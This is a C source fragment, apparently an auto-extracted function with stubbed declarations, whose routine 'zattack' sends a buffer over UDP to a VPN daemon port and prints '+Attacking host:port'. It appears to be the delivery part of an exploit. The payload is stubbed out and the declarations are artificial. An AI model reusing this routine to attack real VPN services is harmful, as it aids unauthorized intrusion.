
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






struct sockaddr_in {int sin_port; int sin_addr; } ;
struct sockaddr {int dummy; } ;
struct hostent {int h_length; int h_addr; } ;
typedef int address ;


 int AF_INET ;
 int EXIT_FAILURE ;
 int PORT_VPND ;
 int SOCK_DGRAM ;
 int abuf ;
 int close (int) ;
 int exit (int ) ;
 int fprintf (int ,char*,int,int) ;
 struct hostent* gethostbyname (char*) ;
 int htons (int) ;
 int memcpy (char*,int ,int ) ;
 int memset (struct sockaddr_in*,int ,int) ;
 int perror (char*) ;
 int printf (char*,char*,int) ;
 int sendto (int,int ,int,int ,struct sockaddr*,int) ;
 int socket (int ,int ,int ) ;
 int stderr ;

__attribute__((used)) static void
zattack (char *host)
{
  struct sockaddr_in address;
  struct hostent *hp;
  int fd, n;

  if ((fd = socket (AF_INET, SOCK_DGRAM, 0)) == -1)
    {
      perror ("socket()");
      exit (EXIT_FAILURE);
    }

  if ((hp = gethostbyname (host)) == ((void*)0))
    {
      perror ("gethostbyname()");
      exit (EXIT_FAILURE);
    }

  memset (&address, 0, sizeof (address));
  memcpy ((char *) &address.sin_addr, hp->h_addr, hp->h_length);
  address.sin_port = htons (PORT_VPND);

  printf ("+Attacking %s:%d\n", host, PORT_VPND);

  n = sendto (fd, abuf, sizeof abuf - 1, 0, (struct sockaddr *) &address, sizeof address);
  if (n != sizeof abuf - 1)
    {
      fprintf (stderr, "zattack: sendto %d != %d\n", n, sizeof abuf - 1);
      exit (EXIT_FAILURE);
    }

  close (fd);
}
